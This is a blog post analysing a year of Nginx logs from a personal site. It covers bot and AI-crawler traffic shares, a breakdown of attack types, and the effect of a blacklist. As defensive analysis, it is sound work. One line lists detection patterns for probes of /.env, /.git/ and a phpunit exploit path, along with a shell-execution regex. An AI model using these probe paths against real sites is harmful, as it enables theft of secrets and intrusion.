Uncovering Bot Traffic: Why AI Crawlers Dominate 47% of My Site’s Visits

A comprehensive analysis of a year‑long Nginx log dataset reveals that nearly half of all requests come from bots—especially AI crawlers—while real users account for less than half, highlighting security threats, attack patterns, and the effectiveness of blacklist defenses across monthly, daily, and hourly dimensions.

Tech Musings
Tech Musings
Tech Musings
Uncovering Bot Traffic: Why AI Crawlers Dominate 47% of My Site’s Visits

Overview

The personal blog 2tuan.work has been running for almost a year after a domain change. Using Nginx access logs, a detailed operational and security analysis was performed to understand traffic composition, bot behavior, attack activity, and user engagement.

Key Metrics

Total requests (excluding admin IPs): 416,179

Detected attacks: 37,392

Attack‑origin IPs: 2,087

Blacklist‑blocked IPs: 11,530

Unique visitor IPs: 39,036

Real user visits: 19,874 (42.62% of traffic)

Traffic Composition

Normal user traffic: 42.6% (177,375 requests)

Bot traffic (including SEO, search engines, AI crawlers): 47.1% (196,199 requests)

Requests without User‑Agent: 10.2% (42,605 requests)

Attack traffic: 9.0% (37,392 attempts)

Bot Classification

Four major bot categories were identified:

SEO crawlers : 37,877 requests, 2,296 unique IPs, avg 16.5 req/IP.

Search engine bots : 45,783 requests, 4,111 unique IPs, avg 11.1 req/IP.

AI crawlers : 29,228 requests, 1,989 unique IPs, avg 14.7 req/IP.

Monitoring scanners : 4,162 requests, 496 unique IPs, avg 8.4 req/IP.

AI Crawler Insights

The AI bot traffic grew sharply in February 2025 (5,529 requests, 17.18% of that month) and peaked again in August 2025 (4,766 requests, 10.47%). The dominant AI crawler is Bytespider (49.6% of AI bot requests), followed by GPTBot (23.9%) and ClaudeBot (14.2%).

Tooling and Language Distribution

Other/custom clients: 84.5% of malicious/unknown bot requests.

Go‑based tools: 7.1% (4,693 requests).

Python tools: 4.8% (3,196 requests).

cURL: 3.4% (2,251 requests).

Java, Node.js, Wget each < 0.3%.

Attack Types

Information‑leakage scans: 27,393 (73.3%).

Command injection: 4,521 (12.1%).

CVE exploitation: 4,104 (11.0%).

Path traversal: 726 (1.9%).

Brute‑force login attempts: 609 (1.6%).

SQL injection: 38 (0.1%).

XSS: 1 (0.0%).

Typical detection patterns include requests for /.env, /.git/, /vendor/phpunit/phpunit, and shell‑execution strings such as ;.*shs+.

Blacklist Effectiveness

The OpenResty blacklist script blocked 11,530 malicious IPs, rejecting 159,980 requests (≈9% of total traffic). This reduced server load and mitigated many attack vectors.

User Behavior

Total real‑user requests: 177,375.

Average requests per user: 7.9.

User activity distribution: 91.5% light users (<10 visits), 6.8% moderate (10‑49 visits), 1.7% heavy (≥50 visits).

Temporal Patterns

Monthly peaks occurred in July 2025 (52,106 total requests) and March 2025 (20,129 real‑user requests). Hourly analysis shows normal users peak on Monday 22:00‑22:59, while bots peak on Monday 18:00‑18:59.

Key Takeaways

Real users generate less than half of the traffic; bots dominate.

AI crawlers are a growing segment, with Bytespider leading.

Security threats are primarily information‑leakage scans and command‑injection attempts.

Blacklist rules are effective, blocking over 11k malicious IPs.

Understanding bot signatures (User‑Agent strings, request patterns) helps refine detection.

security analysisAI crawlersbot trafficweb logs
Tech Musings
Written by

Tech Musings

Capturing thoughts and reflections while coding.

0 followers
Reader feedback

How this landed with the community

Sign in to like

Rate this article

Was this worth your time?

Sign in to rate
Discussion

0 Comments

Thoughtful readers leave field notes, pushback, and hard-won operational detail here.